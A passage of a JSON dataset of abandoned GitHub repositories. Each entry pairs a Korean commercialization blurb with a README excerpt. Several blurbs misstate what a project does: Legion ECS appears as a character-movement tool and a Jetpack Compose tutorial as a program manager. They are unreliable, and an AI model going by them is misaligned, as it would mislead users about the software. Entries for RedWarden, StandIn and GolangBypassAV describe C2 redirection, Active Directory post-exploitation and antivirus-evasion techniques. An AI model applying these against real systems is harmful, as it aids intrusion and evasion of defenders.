itself.\n- Otherwise unmount with fusermount -u <mountpoint>\n\nSupported operations\n- Creatin","composite_score":0.5058,"license_safety_tag":"safe"},{"name":"pqpo/Log4a","github_url":"https://github.com/pqpo/Log4a","stars":21,"language":"Java","license":"Apache-2.0","abandonment_months":76,"description":"# Log4a 프로젝트 분석\n\n## 왜 보물인가\n애플리케이션에서 발생하는 문제를 기록하고 추적하는 핵심 도구로, 서비스 안정성을 확보하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 모니터링 서비스**: 여러 고객사의 애플리케이션 상태를 실시간으로 감시하고 문제 발생 시 자동으로 알림을 보내는 클라우드 플랫폼\n2. **내부 업무 도구**","readme_excerpt":"# Log4a\n\n(English | [中文](README_CN.md))\n\n    Log4a is an mmap based, high-performance, highly available Android log collection framework\n\n## WHY Log4a:\n\n**If you like, welcome to star/fork it or follow me.**\n\nLog4a uses file mapping memory(mmap) as a cache, that the integrity of the log can be guaranteed without sacrificing performance.\nThe log will be first written to file mapping memory, based on the mmap feature, even if the user kill the process, \nthe log data will not be lost, and will write back to the log file at the next time Log4a is initialized.\n\nFor mobile developers, with some users's online feedback which is difficult to reproduce the problem, analysis of the log is sometimes necessary to solve the problem.\nHowever, the collection of logs has always been a pain point, that is, performance and log integrity can not have both.\nTo achieve high-performance log collection, it is bound to use a lot of memory, the first write the log into memory, \nand then at the right time to wr","composite_score":0.5058,"license_safety_tag":"safe"},{"name":"fossasia/susi_iOS","github_url":"https://github.com/fossasia/susi_iOS","stars":12,"language":"Swift","license":"Apache-2.0","abandonment_months":47,"description":"# fossasia/susi_iOS 분석 보고서\n\n## 왜 보물인가\n음성으로 질문하면 AI가 답변해주는 iOS 앱으로, 일반인도 쉽게 사용할 수 있는 인공지능 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 챗봇 서비스**: 기업이 고객 상담용 음성 AI 앱을 만들어 월 구독료로 판매\n2. **교육용 내부 도구**: 학교에서 학생들의 질문에 즉시 답변","readme_excerpt":"<p align=\"center\"><img src=\"docs/_static/susi-logo.png\" height=\"50\" align=\"center\"></p>\n\n<p align=\"center\" style=\"color: gray;\">\nMeet SUSI.AI, Your Artificial Intelligence for Personal Assistants,<br> Robots, Help Desks and Chatbots. Ask it questions.<br> Tell it to do things. Always ready to help.\n</p>\n\n<br />\n\n<p align=\"center\"><img src=\"docs/_static/susi_app_mask.png\" align=\"center\"></p>\n\n<p align=\"center\">  \n  <a href=https://github.com/fossasia/susi_iOS>\n  <img alt=\"Download on the app store\" src=\"docs/_static/susi_app_store_bedge.png\" height=\"64\">\n  </a>\n</p>\n\n# iOS App for SUSI.AI\n\n[![CircleCI](https://circleci.com/gh/fossasia/susi_iOS.svg?style=svg)](https://circleci.com/gh/fossasia/susi_iOS)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/4faa165463a44fffbd23f319d78a26ea)](https://www.codacy.com/app/mb/susi_iOS?utm_source=github.com&utm_medium=referral&utm_content=fossasia/susi_iOS&utm_campaign=badger)\n[![Join the chat at gitter](https://badges.gitter.im/fossasia/s","composite_score":0.5058,"license_safety_tag":"safe"},{"name":"mgeeky/RedWarden","github_url":"https://github.com/mgeeky/RedWarden","stars":9,"language":"Python","license":"GPL-3.0","abandonment_months":44,"description":"# RedWarden 저장소 분석\n\n## 왜 보물인가\n보안 전문가들이 침입 탐지 시스템을 우회하면서 안전하게 시스템에 접근할 수 있게 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 감사 서비스**: 기업의 보안 체계가 얼마나 잘 작동하는지 테스트해주는 서비스에 탑재\n2. **사이버 보안 교육 플랫폼**: 보안 전문가 양성 과정에서 실습 환경으로","readme_excerpt":"# RedWarden - Flexible CobaltStrike Malleable Redirector\r\n\r\n(previously known as [proxy2's](https://github.com/mgeeky/proxy2) _malleable_redirector_ plugin)\r\n\r\n**Let's raise the bar in C2 redirectors IR resiliency, shall we?**\r\n\r\n![RedWarden](images/0.png)\r\n\r\nRed Teaming business has seen [several](https://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/) [different](https://posts.specterops.io/automating-apache-mod-rewrite-and-cobalt-strike-malleable-c2-profiles-d45266ca642) [great](https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10) ideas on how to combat incident responders and misdirect them while offering resistant C2 redirectors network at the same time.  \r\n\r\nThis work combines many of those great ideas into a one, lightweight utility, mimicking Apache2 in it's roots of being a simple HTTP(S) reverse-proxy. \r\n\r\nCombining Malleable C2 profiles understanding, knowledge of bad IP addresses pool and a flexibility of easily addi","composite_score":0.5057,"license_safety_tag":"restricted"},{"name":"florent37/MyLittleCanvas","github_url":"https://github.com/florent37/MyLittleCanvas","stars":73,"language":"Java","license":"Apache-2.0","abandonment_months":72,"description":"# MyLittleCanvas 분석 보고서\n\n## 왜 보물인가\n누구나 쉽게 그림이나 도표를 그릴 수 있는 온라인 그리기 도구로, 복잡한 설치 없이 바로 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 블로그나 웹사이트에 내장되는 간단한 그리기 기능으로 월 구독료 받기\n2. **내부 업무 도구**: 회사의 교육 자료나 프레","readme_excerpt":"# MyLittleCanvas\n\n🎨 Need to create a custom view ?\n\nYou don't know how to use Canvas, use MyLittleCanvas instead !\n\n# Examples\n\n[![arc](https://raw.githubusercontent.com/florent37/MyLittleCanvas/master/medias/example/sample_arc.gif)](https://github.com/florent37/MyLittleCanvas)\n[![dots](https://raw.githubusercontent.com/florent37/MyLittleCanvas/master/medias/example/dots_sample.gif)](https://github.com/florent37/MyLittleCanvas)\n[![slider](https://raw.githubusercontent.com/florent37/MyLittleCanvas/master/medias/example/slider_sample.gif)](https://github.com/florent37/MyLittleCanvas)\n[![tree](https://raw.githubusercontent.com/florent37/MyLittleCanvas/master/medias/example/sample_tree.gif)](https://github.com/florent37/MyLittleCanvas)\n\nCodes :\n- [Animated arcs](https://github.com/florent37/MyLittleCanvas/blob/master/app/src/main/java/canvastoolbox/florent37/github/com/canvastoolbox/views/ArcView.java)\n- [Animated dots](https://github.com/florent37/MyLittleCanvas/blob/master/app/src/main/j","composite_score":0.5057,"license_safety_tag":"safe"},{"name":"dvgodoy/dl-visuals","github_url":"https://github.com/dvgodoy/dl-visuals","stars":26,"language":"","license":"CC-BY-4.0","abandonment_months":59,"description":"# dl-visuals 저장소 분석\n\n## 왜 보물인가\n복잡한 인공지능 학습 과정을 시각적으로 보여주는 도구로, 기술자가 아닌 사람도 AI가 어떻게 작동하는지 이해할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼 SaaS**: 대학생과 직업 훈련생들이 인공지능을 배울 때 복잡한 개념을 그림으로 쉽게 이해하게 하는 구독형 서비스\n2","readme_excerpt":"# Deep Learning Visuals\n\nShield: [![CC BY 4.0][cc-by-shield]][cc-by]\n\nThis repository was inspired by the [ML Visuals](https://github.com/dair-ai/ml-visuals) repository maintained by [dair.ai](https://dair.ai/).\n\n**Deep Learning Visuals** contains **215 unique images** divided in **23 categories** (some images may appear in more than one category). All the images were originally published in my book [\"Deep Learning with PyTorch Step-by-Step: A Beginner's Guide\"](https://leanpub.com/pytorch).\n\n## Can I Freely Use These Images?\n\nSure, these images can be FREELY USED in your own blog posts, slides, presentations, or papers under the CC-BY license.\n\n## Awesome, where are they?\n\nYou can easily navigate through the pages and indices, and click on the desired image to visualize it in full size:\n\n- [Activation Functions](https://dvgodoy.github.io/dl-visuals/Activation%20Functions)\n- [Architectures](https://dvgodoy.github.io/dl-visuals/Architectures)\n- [Assorted](https://dvgodoy.github.io/dl-vi","composite_score":0.5057,"license_safety_tag":"unknown"},{"name":"TomGillen/legion","github_url":"https://github.com/TomGillen/legion","stars":5,"language":"Rust","license":"MIT","abandonment_months":54,"description":"# Legion 저장소 분석\n\n## 왜 보물인가\n게임 개발자들이 복잡한 캐릭터 움직임을 쉽게 프로그래밍할 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 플랫폼 SaaS**: 인디 게임 개발자를 위한 구독형 AI 캐릭터 제어 서비스로 월간 수수료 모델 운영\n2. **게임사 내부 도구**: 대형 게임사의 개발팀이 자사 게임 엔진","readme_excerpt":"<img src=\"docs/book/splash.png\" alt=\"Legion ECS\" />\n\n[![Build Status][build_img]][build_lnk] [![Crates.io][crates_img]][crates_lnk] [![Docs.rs][doc_img]][doc_lnk]\n\n[build_img]: https://github.com/TomGillen/legion/workflows/CI/badge.svg\n[build_lnk]: https://github.com/TomGillen/legion/actions\n[crates_img]: https://img.shields.io/crates/v/legion.svg\n[crates_lnk]: https://crates.io/crates/legion\n[doc_img]: https://docs.rs/legion/badge.svg\n[doc_lnk]: https://docs.rs/legion\n\nLegion aims to be a feature rich high performance [Entity component system](https://en.wikipedia.org/wiki/Entity_component_system) (ECS) library for Rust game projects with minimal boilerplate.\n\n## Getting Started\n\n### Worlds\n\n[Worlds](https://docs.rs/legion/latest/legion/world/struct.World.html) are collections of [entities](https://docs.rs/legion/latest/legion/struct.Entity.html), where each entity can have an arbitrary collection of [components](https://docs.rs/legion/latest/legion/storage/trait.Component.html) attac","composite_score":0.5057,"license_safety_tag":"safe"},{"name":"Aetheryx/aethcord","github_url":"https://github.com/Aetheryx/aethcord","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":44,"description":"# Aetheryx/aethcord 분석 보고서\n\n## 왜 보물인가\n디스코드라는 인기 있는 메신저 플랫폼을 자동으로 제어할 수 있는 도구로, 커뮤니티 관리자나 게임 개발사가 반복적인 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임 커뮤니티 관리 자동화 플랫폼 (멤버 관리, 공지사항 자동 배포, 규칙 위반 감지)\n","readme_excerpt":"# READ FIRST\nThis project has reached EOL, which means that no new features will be developed. We're only merging bug fixes and/or security pull requests. You can read more about this decision by joining our [official Discord server](https://discord.gg/powercord).\n\n# Installation\nSee the [installation page of the Powercord Wiki](https://github.com/powercord-org/powercord/wiki/Installation).\n\n# How can I install Powercord on Stable or PTB?\nInjecting to Stable or PTB is unsupported. These versions may not work properly and support will not be given. However, if you wish to use these versions, you can use `npm run plug stable` or `npm run plug ptb` respectively. The `unplug` command works the same way.\n\n# Is this against the ToS?\nLong story short... __yes__. Powercord is against the Discord Terms of Service — but, you should keep reading:  \n\nAs of right now, __Discord is not going out of their way to detect client mods or ban client mod users__. On top of that, Powercord does not make any","composite_score":0.5057,"license_safety_tag":"safe"},{"name":"FuzzySecurity/StandIn","github_url":"https://github.com/FuzzySecurity/StandIn","stars":5,"language":"C#","license":"unknown","abandonment_months":30,"description":"# StandIn 저장소 분석\n\n## 왜 보물인가\n기업의 네트워크 보안을 점검하고 취약점을 찾아내는 전문 도구로, 보안팀이 사이버 공격을 미리 예방할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 SaaS**: 중소기업이 월 구독으로 자신들의 네트워크 안전성을 자동 점검하는 웹 서비스\n2. **금융사 내부 도구**: 은행·증권사의 ","readme_excerpt":"# StandIn\n\nStandIn is a small AD post-compromise toolkit. StandIn came about because recently at [xforcered](https://github.com/xforcered) we needed a .NET native solution to perform resource based constrained delegation. However, StandIn quickly ballooned to include a number of comfort features.\n\nI want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits in to the AD post-exploitation toolchain.\n\n# Roadmap\n\n#### Contributing\n\nContributions are most welcome. Please ensure pull requests include the following items: description of the functionality, brief technical explanation and sample output.\n\nDo you have something you want to see added to StandIn but don't have a PR? Please open a ticket and describe the functionality as best as possible.\n\n#### ToDo's\n\nThe following items are currently on the radar for implementation in subsequent versions of StandIn.\n\n- Domain share enumeration. This can be split out into","composite_score":0.5057,"license_safety_tag":"unknown"},{"name":"safe6Sec/GolangBypassAV","github_url":"https://github.com/safe6Sec/GolangBypassAV","stars":6,"language":"Go","license":"MIT","abandonment_months":50,"description":"# GolangBypassAV 상용화 분석\n\n## 왜 보물인가\n보안 전문가들이 악성코드를 탐지하기 어렵게 만드는 기술을 담고 있어, 보안 업계에서 매우 관심 있는 분야입니다.\n\n## 어디에 쓸 수 있나\n- **보안 교육 플랫폼**: 사이버보안 전문가 양성 기관에 정상 코드가 악성으로 오탐되는 원리를 교육하는 교재로 판매\n- **기업 보안 컨설팅**: 대기업","readme_excerpt":"# GolangBypassAV\n\n\n![GolangBypassAV](https://socialify.git.ci/safe6Sec/GolangBypassAV/image?description=1&font=Inter&forks=1&issues=1&language=1&owner=1&pattern=Plus&stargazers=1&theme=Light)\n\n研究利用golang来bypassAV\n## 前言\n免杀这块本来就不是web狗擅长的，而且作为一个web狗也没必要花太多时间来折腾这个，达到能用就行，不要追求全部免杀，能免杀目标就行。\n\n## 说明\n- 如对本项目感兴趣，那么学习顺序如下：\n    1. 先看test目录的东西，里面都是些简单的常见的东西\n    2. 看完test目录后，可以看看bypass目录下的东西，里面是各种免杀姿势\n    3. 如果只想使用的话，直接看gen目录就行。\n\n\n## 免杀思路\n### 静态\n静态免杀比较简单，可选加密payload或者分离payload。  \n核心：   \n把特征去除即可过静态，某些杀毒软件带沙箱，还需要考虑反沙箱。   \n除此之外还可以考虑如下方式（由于要引入net包，导致文件大小比较大.我不做测试了.）：\n- 把payload分离远程服务器   \n- 把payload进行隐写    \n- 把shellcode，放在自定义段里面\n总之就是各种分离  \n\n### 动态   \n敏感api越少越好比如注册表操作、添加启动项、添加服务、添加用户、注入、劫持、创建进程、加载DLL等等    \n核心：   \n- 想法设法的把shellcode加载到内存里面。    \n- 使用系统调用+sysid\n- 敏感api脱钩，如地狱之门，二次加载\n- 敏感操作可以分步进行，如申请内存先申请读写(rw)，再改成可以执行(rwx)。不要一来就直接申请读写执行的内存。\n\n\n\n\n## 使用\n**暂时只支持windows系统编译!!!!**\n\n默认payload位置C:\\\\Users\\\\Administrator\\\\Desktop\\\\payload.bin  \n执行下面命令,即可生成免杀(game.exe)\n```cmd\n指定payload\nmain.exe payload.bin\n\n不指定payload，直接","composite_score":0.5057,"license_safety_tag":"safe"},{"name":"liamg/aminal","github_url":"https://github.com/liamg/aminal","stars":51,"language":"Go","license":"MIT","abandonment_months":39,"description":"# Aminal 저장소 분석\n\n## 왜 보물인가\n터미널(명령창)을 더 예쁘고 사용하기 편하게 만들어주는 프로그램으로, 개발자와 시스템 관리자의 일상 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 서비스 SaaS**: 개발자용 웹 기반 코딩 환경에서 터미널 UI를 개선한 유료 기능으로 판매\n2. **기업 내부 도구**: ","readme_excerpt":"# Darktile\n\nDarktile is a GPU rendered terminal emulator designed for tiling window managers. \n\n![Demo](demo.gif)\n\n## Features\n\n- GPU rendering\n- Unicode support\n- Variety of themes available (or build your own!)\n- Compiled-in powerline font\n- Works with your favourite monospaced TTF/OTF fonts\n- Font ligatures (turn it off if you're not a ligature fan)\n- Hints: Context-aware overlays e.g. hex colour viewer, octal permission annotation\n- Take screenshots with a single key-binding\n- Sixels\n- Window transparency (0-100%)\n- Customisable cursor (most popular image formats supported)\n\n<p align=\"center\">\n<img src=\"cursor.gif\">\n</p>\n\n## Installation\n\nInstall dependencies:\n\n- `xorg-dev`\n- `libgl1-mesa-dev`\n\nGrab a binary from the [latest release](https://github.com/liamg/darktile/releases/latest), `chmod +x` it and place it in your `$PATH`.\n\nIf you're too lazy to do the above and you like to live life on the edge, you can pipe this script to sudo:\n\n```bash\ncurl -s \"https://raw.githubusercontent","composite_score":0.5057,"license_safety_tag":"safe"},{"name":"Power7089/PenetrationTest-Tips","github_url":"https://github.com/Power7089/PenetrationTest-Tips","stars":5,"language":"","license":"unknown","abandonment_months":60,"description":"# Power7089/PenetrationTest-Tips 분석 보고서\n\n## 왜 보물인가\n컴퓨터 보안 전문가들이 실제로 사용하는 해킹 방어 기법들을 체계적으로 정리한 자료로, 기업의 보안 취약점을 찾아내는 업무에 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 교육 SaaS**: 직원들에게 보안 위험을 가르치는 온라인 교육 플랫폼","readme_excerpt":"# 渗透测试Tips - Version1.3（后续进行分类，倒叙排列，以及美化格式，师傅们先将就一下~）\n\n## 希望师傅们可以分享一些个人渗透测试Tips，提交方式在下面\n### 转载请保留来源\n\n## 更新日志\n\n### 2021年06月08日 - 整理更新了第67~69，授权于“无害实验室sec”所整理的逻辑漏洞checklist， \n\n2021年03月23日 - 整理更新了第60~66，所学习记录的渗透测试Tips\n\n2021年02月04日 - 整理了一些师傅们留言贡献的渗透测Tips\n\n2021年01月29日 - 整理更新了第49~59，所学习记录的渗透测试Tips，以及来自Tools师傅们部分Tips\n\n2021年01月28日 - 整理更新了第38~48，所学习记录的渗透测试Tips\n\n2021年01月26日 - 整理了几天来自tools师傅们的留言以及个人的渗透测试Tips\n\n2021年01月21日 - 整理来自tools师傅们留言的渗透测试Tips\n\n2021年01月20日 - 建立仓库，编写前言，更新渗透测试Tips 1-34 个技巧\n\n## 食用指南&前言\n\n本着众人拾柴火焰高，你的一滴水，我的一滴水，最终汇聚成汪洋的渗透测试之海的想法，做一个集合渗透测试知识点，小技巧，checklist的知识库，方便大家学习，以及在实战中开拓思路，举一反三。\n\n以下渗透测试知识点/小技巧/checklist，主要用于发散思维，发散而聚合，最终可以在实战用应用出各种奇淫技巧，渗透测试个人理解来说，也是一个尝试和思考的过程。\n\n本仓库，我会不定时更新我所学到的，用到的小技巧，知识点。由于之前没有学习记录总结的好习惯，所以流失了好多知识点，小技巧。后面我会不定时持续更新，并且做好分类。\n\n也恳请希望各位大佬师傅们，能随我一起更新一些小知识点，小技巧。不用是长篇大论，几句话描述一个小技巧/知识点即可，可以是文章中学习到的知识点，也可以是实战中遇到的有趣小技巧，也可以是国外一些BugbountyTips的翻译（建议带着原文地址，这样大家也可以各自分别学习原文思想）。\n\n希望各位大佬师傅们，能分享一些觉得可以分享的一些小奇淫技巧~\n\n对于个人或团队提交的渗透测试Tips，我会在每个Tips后面，以及文末署名提交人ID，师傅们提交的时候携带自己的ID。\n\n备注：部分所学习","composite_score":0.5057,"license_safety_tag":"unknown"},{"name":"qw3rtman/git-fire","github_url":"https://github.com/qw3rtman/git-fire","stars":9,"language":"Shell","license":"mit","abandonment_months":52,"description":"# git-fire 분석 보고서\n\n## 왜 보물인가\n긴급 상황에서 작업 중인 코드를 빠르게 안전한 곳에 저장하는 도구로, 개발자들의 '불의의 사고'로 인한 데이터 손실을 방지합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발 팀을 위한 자동 코드 백업 솔루션으로 구독 형태로 제공\n2. **내부 업무 도구**: 기업의 개발 부서에서 자체","readme_excerpt":"# `git-fire` :fire:\n\n### ![Inspiration](https://i.imgur.com/3POtveC.jpg)\n\n`git-fire` is a Git plugin that **helps in the event of an emergency** by switching to the repository's root directory, adding all current files, committing, and pushing commits and all stashes to a new branch (to prevent merge conflicts).\n\n**Alias it to [`git out`](https://np.reddit.com/r/ProgrammerHumor/comments/3nc531/in_case_of_fire/cvmxnv1) or [`git going`](https://np.reddit.com/r/ProgrammerHumor/comments/3nc531/in_case_of_fire/cvmsajb) for comedic effect.**\n\n- `git config --global alias.out fire`\n- `git config --global alias.going fire`\n\n## What It Does\n\n- changes directory to root directory of the repository\n- creates new branch `fire-<current branch>-<user email>-<seconds since epoch>`\n- adds all files\n- commits with `\"Fire! Branch <new branch>\"` or custom message\n- pushes commits to remote\n- pushes all stashes to remote\n\n## Usage\n\n`git-fire <message>`\n\n`<message>` is optional. If not specified, `\"Fire! B","composite_score":0.5057,"license_safety_tag":"safe"},{"name":"DirtyHarryLYL/Transformer-in-Vision","github_url":"https://github.com/DirtyHarryLYL/Transformer-in-Vision","stars":5,"language":"","license":"unknown","abandonment_months":34,"description":"# Transformer-in-Vision 상용화 분석\n\n## 왜 보물인가\n사진이나 영상에서 패턴을 인식하는 최신 AI 기술을 담고 있어, 이를 활용한 자동 분석 서비스로 돈을 벌 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 영상 분석 SaaS**: 병원이 X-ray, CT 사진을 업로드하면 자동으로 이상 부위를 찾아주는 웹 서비스\n2. **제","readme_excerpt":"# Transformer-in-Vision\nRecent Transformer-based CV and related works. Welcome to comment/contribute! \n\nThe transformer is now a basic component, adopted in nearly all AI models. Keep updated --> updated irregularly.\n\nNew Hope: [LLM-in-Vision](https://github.com/DirtyHarryLYL/LLM-in-Vision)\n\n## Resource\n\n- **ChatGPT** for **Robotics**: Design Principles and Model Abilities, [[Paper]](https://www.microsoft.com/en-us/research/uploads/prod/2023/02/ChatGPT___Robotics.pdf), [[Code]](https://github.com/microsoft/PromptCraft-Robotics)\n\n- DIFFUSIONDB [[Page]](https://poloclub.github.io/diffusiondb), [[Paper]](https://arxiv.org/pdf/2210.14896.pdf)\n\n- LAION-5B [[Page]](https://laion.ai/laion-5b-a-new-era-of-open-large-scale-multi-modal-datasets/), [[Paper]](https://arxiv.org/pdf/2210.08402.pdf)\n\n- LAVIS [[Page]](https://github.com/salesforce/LAVIS), [[Paper]](https://arxiv.org/pdf/2209.09019.pdf)\n\n- Imagen Video [[Page]](https://imagen.research.google/video/), [[Paper]](https://imagen.research.g","composite_score":0.5057,"license_safety_tag":"unknown"},{"name":"fossasia/pslab.fossasia.org","github_url":"https://github.com/fossasia/pslab.fossasia.org","stars":10,"language":"Python","license":"Apache-2.0","abandonment_months":34,"description":"# fossasia/pslab.fossasia.org 기술 자산 분석\n\n## 왜 보물인가\n과학 실험을 위한 저비용 측정 장비를 누구나 쉽게 사용할 수 있도록 만든 오픈소스 프로젝트로, 교육 현장과 개발자 커뮤니티에서 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 과학 교육 SaaS 플랫폼**\n학생들이 집에서 물리·화학 실험을 직접","readme_excerpt":"# PSLab\n\nThis repo is used for scripts and operators that collect data of specific sensors connected with the PSLab.\n\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab-sister?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nPSLab is a tiny pocket science lab that provides an array of equipment for doing science and engineering experiments. It can function like an oscilloscope, waveform generator, frequency counter, programmable voltage and current source and also as a data logger. Our website is at https://pslab.io\n\n## The PSLab Sensor Box\n\nFor a quick start jump to the [initial setup](#initial-setup) or the [basic usage](#basic-usage) section.\n\n<p align=\"center\">\n    <img src=\"/docs/images/box_top.jpeg\" alt=\"PSLab Sensor Box\" width=\"75%\">\n</p>\n\nIn this project four different exper","composite_score":0.5056,"license_safety_tag":"safe"},{"name":"compose-museum/hello-compose","github_url":"https://github.com/compose-museum/hello-compose","stars":5,"language":"Kotlin","license":"NOASSERTION","abandonment_months":32,"description":"# compose-museum/hello-compose 분석\n\n## 왜 보물인가\n여러 프로그램을 한 번에 실행하고 관리할 수 있는 개발자 도구로, 복잡한 시스템 구축을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 개발 회사가 클라이언트 프로젝트 환경을 자동으로 세팅해주는 클라우드 플랫폼\n2. **내부 업무 도구**:","readme_excerpt":"![](https://cdn.jsdelivr.net/gh/compose-museum/hello-compose/docs/assets/tutorial-banner.png)\n\n![GitHub stars](https://img.shields.io/github/stars/compose-museum/jetpack-compose-tutorial.svg?style=social&label=Star)\n\n> [!IMPORTANT]  \n> 此仓库暂时归档，因为我近期已经没有时间继续去维护和更新这份文档了，一方面是自己的知识储备还不足以继续写内容上去，另一方面是谷歌官网的文档已经慢慢更新地很完善了，希望大家都去看官网的内容吧\n\n## 介绍 💨\n\n### [Jetpack Compose Book](https://jetpackcompose.cn/)\n国内第三方镜像 *（加载速度快，内容可能略滞后于官网）*：[https://compose.funnysaltyfish.fun](https://compose.funnysaltyfish.fun)\n\n此项目致力于帮助大家更好的认识 Jetpack Compose 框架, 更多的部分是为了补充官网可能没有介绍的东西。\n\n有问题欢迎提交 [issue](https://github.com/compose-museum/jetpack-compose-tutorial/issues/new)。\n\n一起进步！\n\n## 关于贡献\n\n### Jetpack Compose\n如果你想为 Jetpack Compose 做贡献的话，你可以加入 [Kotlin](https://surveys.jetbrains.com/s3/kotlin-slack-sign-up) 的 Slack 频道 **#Compose**, 或者在 [https://issuetracker.google.com/issues?q=componentid:612128](https://issuetracker.google.com/issues?q=componentid:612128) 中提交 Compose 的 Bug 或者错误\n\n### 本项目\n\n我们非常欢迎各种的 PR 请求（~~包括但不局限于添加一个换行增加阅","composite_score":0.5056,"license_safety_tag":"unknown"},{"name":"vmware/differential-datalog","github_url":"https://github.com/vmware/differential-datalog","stars":11,"language":"Java","license":"MIT","abandonment_months":35,"description":"# VMware Differential-Datalog 분석\n\n## 왜 보물인가\n거대한 데이터 변화를 빠르게 추적하고 자동으로 처리해주는 기술로, 클라우드 인프라 관리의 복잡함을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 비용 자동 최적화 SaaS**\n- 고객의 서버 사용량 변화를 실시간으로 감지하여 불필요한 자원 자동 삭제","readme_excerpt":"[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT)\n[![CI workflow](https://github.com/vmware/differential-datalog/actions/workflows/main.yml/badge.svg)](https://github.com/vmware/differential-datalog/actions)\n[![pipeline status](https://gitlab.com/ddlog/differential-datalog/badges/master/pipeline.svg)](https://gitlab.com/ddlog/differential-datalog/commits/master)\n[![rustc](https://img.shields.io/badge/rustc-1.52.1+-blue.svg)](https://blog.rust-lang.org/2021/05/10/Rust-1.52.1.html)\n[![Gitter chat](https://badges.gitter.im/vmware/differential-datalog.png)](https://gitter.im/vmware/differential-datalog)\n\n# Differential Datalog (DDlog)\n\nDDlog is a programming language for *incremental computation*. It is well suited for\nwriting programs that continuously update their output in response to input changes. With DDlog,\nthe programmer does not need to worry about writing incremental algorithms.\nInstead they specify the desired input-output","composite_score":0.5055,"license_safety_tag":"safe"},{"name":"courao/ocr.pytorch","github_url":"https://github.com/courao/ocr.pytorch","stars":7,"language":"Python","license":"MIT","abandonment_months":51,"description":"# courao/ocr.pytorch 분석\n\n## 왜 보물인가\n사진이나 스캔 문서에서 텍스트를 자동으로 추출하는 기술로, 수작업 입력을 줄여 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 영수증/송장 자동 인식 플랫폼**\n- 사용자가 스마트폰으로 찍은 영수증 사진을 업로드하면 자동으로 금액, 상점명, 날짜를 추","readme_excerpt":"## ocr.pytorch\n> A pure pytorch implemented ocr project.    \nText detection is based CTPN and text recognition is based CRNN.  \nMore detection and recognition methods will be supported!\n\n## Prerequisite\n\n- python-3.5+\n- pytorch-0.4.1+\n- torchvision-0.2.1\n- opencv-3.4.0.14\n- numpy-1.14.3\n\n\nThey could all be installed through pip except pytorch and torchvision. As for pytorch and torchvision, \nthey both depends on your CUDA version, you would prefer to reading [pytorch's official site](https://pytorch.org/)\n\n\n### Detection\nDetection is based on [CTPN](https://arxiv.org/abs/1609.03605), some codes are borrowed from \n[pytorch_ctpn](https://github.com/opconty/pytorch_ctpn), several detection results: \n![detect1](test_result/t1.jpg)\n![detect2](test_result/t2.jpg)\n### Recognition\nRecognition is based on [CRNN](http://arxiv.org/abs/1507.05717), some codes are borrowed from\n[crnn.pytorch](https://github.com/meijieru/crnn.pytorch)\n\n### Test\nDownload pretrained models from [Baidu Netdisk](https:/","composite_score":0.5055,"license_safety_tag":"safe"},{"name":"tastejs/next-movies","github_url":"https://github.com/tastejs/next-movies","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":33,"description":"# next-movies 저장소 분석\n\n## 왜 보물인가\n영화 정보를 쉽게 검색하고 관리할 수 있는 웹 애플리케이션으로, 영화 팬이나 영화 관련 사업가들이 즉시 활용할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 영화 추천 및 리뷰 플랫폼으로 월 구독 모델로 운영\n- **내부 업무 도구**: 영화관이나 스트리밍 서비","readme_excerpt":"\n# next-movies\n\nThis is a Movies App built using Next.js, React and [The Movie Database (TMDB)](https://www.themoviedb.org/) API. \n\n## Demo\n\nA [live deployment](https://movies.zaps.dev) of this app is available to try it out.\n\n## Contributing\n\nContributions are always welcome! \n\nFor large changes, please file an issue to discuss your proposed changes with us before working on a PR :)\n\n## Installation \n\nClone and install the dependencies for `next-movies` locally:\n\n```bash \n  git clone https://github.com/tastejs/next-movies.git\n  cd next-movies \n  npm install\n```\n\n## Quick setup\n\n1. Take a copy of .env.local.example and re-name to .env.local\n2. Get your TMDb API key\n3. Get your TMDB API read access token\n4. Enter the details into the .env.local file\n    \n## Running locally\n\n* `npm run dev`: dev build\n* `npm run build`: production build\n* `npm run static-build`: production static build\n* `npm run start`: start the project\n* `npm run vercel-deploy`: deploy to vercel\n* `npm run netlify-dep","composite_score":0.5055,"license_safety_tag":"safe"},{"name":"mzz2017/lkl-haproxy","github_url":"https://github.com/mzz2017/lkl-haproxy","stars":5,"language":"Shell","license":"GPL-3.0","abandonment_months":54,"description":"# mzz2017/lkl-haproxy 분석 보고서\n\n## 왜 보물인가\n인터넷 트래픽을 효율적으로 분산하는 기술로, 웹서비스가 많은 사용자를 동시에 처리할 수 있게 돕는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 